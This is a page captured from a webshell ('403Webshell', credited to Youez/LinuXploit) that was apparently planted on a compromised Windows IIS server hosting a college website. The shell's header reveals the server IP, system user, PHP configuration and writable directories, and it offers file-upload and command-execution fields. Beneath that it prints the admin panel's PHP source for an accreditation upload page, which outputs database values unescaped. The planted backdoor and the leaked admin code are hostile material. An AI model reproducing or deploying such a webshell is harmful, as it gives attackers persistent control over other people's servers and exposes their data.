403Webshell
Server IP : 50.63.8.194  /  Your IP : 216.73.216.202
Web Server : Microsoft-IIS/10.0
System : Windows NT P3NWVPWEB026 10.0 build 17763 (Windows Server 2016) AMD64
User : IWPD_7824(SpiPanel) ( 0)
PHP Version : 7.3.33
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  G:/PleskVhosts/polyprep.in/mmitshamli.ac.in/admin/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : G:/PleskVhosts/polyprep.in/mmitshamli.ac.in/admin//add_accrd.php
	<?php
		include("connection.php");
		$query="select * from tbl_accreditation order by ac_id desc";
		$res=mysqli_query($dbCon,$query);
	?>

	<?php include 'header.php';?>

	<div class="page-header page-header-light">
		<div class="breadcrumb-line breadcrumb-line-light header-elements-md-inline">
			<div class="d-flex">
				<div class="breadcrumb">
					<a href="#" class="breadcrumb-item"><i class="icon-stack"></i>Manage Accreditation</a>
					<span class="breadcrumb-item active">Accreditation</span>
				</div>
				<a href="#" class="header-elements-toggle text-default d-md-none"><i class="icon-more"></i></a>
			</div>
		</div>
	</div>
	<!-- /page header -->

	<div class="row">
		<div class="col-xl-12">
		<!-- Traffic sources -->
			<div class="card">
				<div class="card-header header-elements-inline">
					<h5 class="card-title">Add Accreditation</h5>
					<h5 class="card-title" id="msg" style="color:orangered;"></h5>
					<div class="header-elements">
						<div class="list-icons">
							<a class="list-icons-item" data-action="collapse"></a>
							<a class="list-icons-item" data-action="reload" onclick="formrest()"></a>
						</div>
					</div>
				</div>                       
				<form action="all.php" method="post" enctype="multipart/form-data">
				<!--Date :
				<input type="date" name="date"><br><br>
				Attached File : (file shoud be in .pdf formate)
				<input type="file" name="pdf" onchange="validextension(this);"><br><br>
				<input type="submit" name="time-table" value="Upload">-->
				<div class="card-body">
				<div class="form-group">
							<div class="row">
								<div class="col-md-6">
									<label>Session</label>
									<input type="text" name="session" placeholder="Session" required class="form-control" />
								</div>
								<div class="col-md-6">
									<label for="type" required>Select Govt. Body</label>
									<select name="type" id="type" class="form-control">
										<option value="" disabled selected>select govt. body</option>
										<option value="nba">NBA</option>
										<option value="naac">NAAC</option>
									</select>
								</div>
							</div>
						</div>
					
						<div class="form-group">
							<div class="row">
								<div class="col-md-6">
									<label for="date">Date</label>
									<input type="date" id="date" class="form-control"  name="date" required />
								</div>
								<div class="col-md-6">
									<label>Upload Pdf File</label>
									<input type="file" name="pdf" placeholder="Pdf File" class="form-control" />
								</div>
							</div>
						</div>
						
						<div class="text-left">
							<input type="submit" name="accrdsub" class="btn btn-primary" value="Upload">
						</div>
					</form>
					<table class="table datatable-button-init-basic datatable-reorder">
						<thead>
							<tr>
								<th>S.No.</th>
								
								<th>File</th>
								<th>Post Date</th>
								<th>Govt. Body</th>
								<th>Session</th>
								<th>Action</th>
							</tr>
						</thead>
					<tbody>
						<?php
							$a=1;
							while($row=mysqli_fetch_array($res))
							{
						?>
						<tr>
							<td><?php echo $a;$a++;?></td>
							
							<td><a href="accreditation/<?php echo $row['file'];?>" target="_blank">Click Here</a></td>
							<td><?php echo $row['date'];?></td>
							<td><?php echo $row['type'];?></td>
							<td><?php echo $row['session'];?></td>
							<td><a href="del_accrd.php?id=<?php echo $row['ac_id'];?>" id="del">Delete</a></td>
						</tr>
						<?php
							}
						?>
					</tbody>
					</table>
				</div>
			</div>
		</div>
	</div>

<?php include 'footer.php';?>

Youez - 2016 - github.com/yon3zu
LinuXploit